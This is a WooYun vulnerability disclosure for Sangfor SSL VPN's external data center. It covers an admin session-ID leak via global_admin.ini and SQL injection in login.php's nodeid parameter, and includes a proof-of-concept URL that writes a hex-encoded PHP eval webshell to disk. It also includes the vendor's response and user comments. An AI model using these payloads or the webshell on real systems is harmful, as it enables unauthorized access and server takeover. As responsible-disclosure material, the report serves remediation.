漏洞概要
关注数(24)
关注此漏洞
漏洞标题:深信服SSL VPN外置数据中心敏感信息泄漏&SQL注入漏洞可导致getshell
提交时间:2014-06-12 20:01
修复时间:2014-09-10 20:02
公开时间:2014-09-10 20:02
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2014-06-12: 细节已通知厂商并且等待厂商处理中
2014-06-13: 厂商已经确认,细节仅向厂商公开
2014-06-16: 细节向第三方安全合作伙伴开放
2014-08-07: 细节向核心白帽子及相关领域专家公开
2014-08-17: 细节向普通白帽子公开
2014-08-27: 细节向实习白帽子公开
2014-09-10: 细节向公众公开
简要描述:
测试版本为SSL 5.7的外置DC,主要有两个问题:
1、管理员sessionid泄漏
2、SQL注入
详细说明:
一、敏感信息泄漏:
Admin用户登录后,会出现一个文件(Admin未登录时此文件不存在)
里面包含了Admin用户的phpsessionid,并且任意用户可访问,如下图:
https://192.168.222.128/global_admin.ini
利用方法类似XSS,其它用户将浏览器cookie phpsessionid改成对应的值,再访问/src/index.php就是管理员用户了,无需知道帐号密码
利用fiddler把phpsessionid改成Admin对应的sessionid:
再访问/src/index.php,直接登录了:
系统设置--环境设置--其它,可以看到服务器绝对路径:
二、SQL注入
/src/login.php代码审核:
php class adtLogin代码文件:/src/inc/class/adtLogin.class.php
OpenDb函数定义在/src/inc/class/SinforDbBase.class.php里
注入POC:
https://IP/src/login.php?action_c=login&user_type=1g&user=admin&pass=admin&nodeid=3 and 1=1
提示“用户名或密码不正确”
https://IP/src/login.php?action_c=login&user_type=1g&user=admin&pass=admin&nodeid=3 and 1=2
提示“连接数据库失败”
由于有防爆破登录机制,这里用sqlmap注入会有很大麻烦,需要很长时间
由于mysql用户是root,并且magic_quotes_gpc = Off,系统又是windows,呵呵了,直接getshell:
https://IP/src/login.php?action_c=login&user_type=1&user=admin&pass=admin&nodeid=3 union select 0x3c3f70687020406576616c28245f504f53545b277362275d293b3f3e into outfile 'C:\Program Files\Sangfor\SSL\LogKeeper\htdocs\test.php'
生成一句话,密码sb,访问地址:https://IP/test.php
具体路径可以利用上面的管理员session泄漏漏洞登录系统后获取
漏洞证明:
getshell:
修复方案:
1、修正那搞笑的逻辑
2、对参数做严格检查。比如intval
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2014-06-13 14:14
厂商回复:
首先感谢白帽子对深信服产品提出的建议,经内部验证,有3点需要向您说明:
1、SSL VPN外置的数据中心主要存放VPN的相关日志,用于给管理员进行分析,对于SSL VPN的安全性影响较低;
2、SSL VPN的外置数据中心用户量较少,大部分功能都已经在SSL VPN设备上实现,只有少数用户会使用外置数据中心;
3、SSL VPN的数据中心部署于内网。
基于以上三点原因,我们将漏洞级别降低为中级。同时,我们已经启动应急程序,会对数据中心安装包的安全性进行严格的审查和改善,尽快发布新版安装包。
另外,工作人员已经私信给您,请留下联系方式,后续我们会寄出小礼物来对您表示感谢。 (^_^)
首先感谢白帽子对深信服产品提出的建议,经内部验证:
1、SSL VPN外置的数据中心主要存放VPN的操作日志,用于给管理员进行分析,不涉及到SSL VPN的权限安全问题,.....
2、SSL VPN的外置数据中心用量较小,大部分功能都已经在SSL VPN设备上实现,只有少数用户会使用外置数据中心;
3、SSL VPN的数据中心主要部署于内网,
基于以上三点原因,我们将漏洞级别降低为中级。我们已经启动应急程序,会对数据中心安装包的安全性进行严格的审查和改善,尽快发布新版安装包。
另外,工作人员已经私信给您,请留下联系方式,后续我们会寄出小礼物来表示对您的感谢。
最新状态:
暂无
漏洞评价:
评论
-
2014-06-13 00:16 |
小森森 ( 路人 | Rank:11 漏洞数:2 | 不中二 枉少年)
-
2014-06-13 08:54 |
kgra ( 路人 | Rank:17 漏洞数:3 | 一波还未平息,一波洞又来袭)
-
2014-06-13 10:42 |
小森森 ( 路人 | Rank:11 漏洞数:2 | 不中二 枉少年)
@kgra 貌似比较常见的一种用途是提供给外网的,能访问内网资源的vpn。。高校们很多都在用
-
2014-06-13 14:02 |
大狮子 ( 路人 | Rank:1 漏洞数:1 | 学习,分享,进步)
@小森森 使用外置DC的不多,外置DC允许外网访问的更少
-
2014-06-13 14:18 |
深信服(乌云厂商)
抱歉~ 由于操作失误,部分冗余信息未删除,请大家见谅~~
-
2014-06-13 14:37 |
乐乐、 ( 普通白帽子 | Rank:853 漏洞数:189 )
-
2014-06-13 15:01 |
小森森 ( 路人 | Rank:11 漏洞数:2 | 不中二 枉少年)
@大狮子 额……是外置数据中心啊……之前没看到抱歉
-
2014-06-28 15:37 |
f4ckbaidu ( 普通白帽子 | Rank:182 漏洞数:23 | 开发真是日了狗了)
描述部分有问题,我提交了N次修改,也PM了,怎么没人理?
-
2014-07-02 21:36 |
hacker@sina.cn ( 普通白帽子 | Rank:288 漏洞数:27 | ANONYMOUS)
-
2014-07-05 15:49 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)
-
2014-08-11 15:45 |
f4ckbaidu ( 普通白帽子 | Rank:182 漏洞数:23 | 开发真是日了狗了)
-
2014-09-11 20:51 |
wellsun ( 路人 | Rank:0 漏洞数:1 | www.wellsun.com)
诚心诚信RMB收购乌云币~ 价格加Q谈:7520024 (加者备注)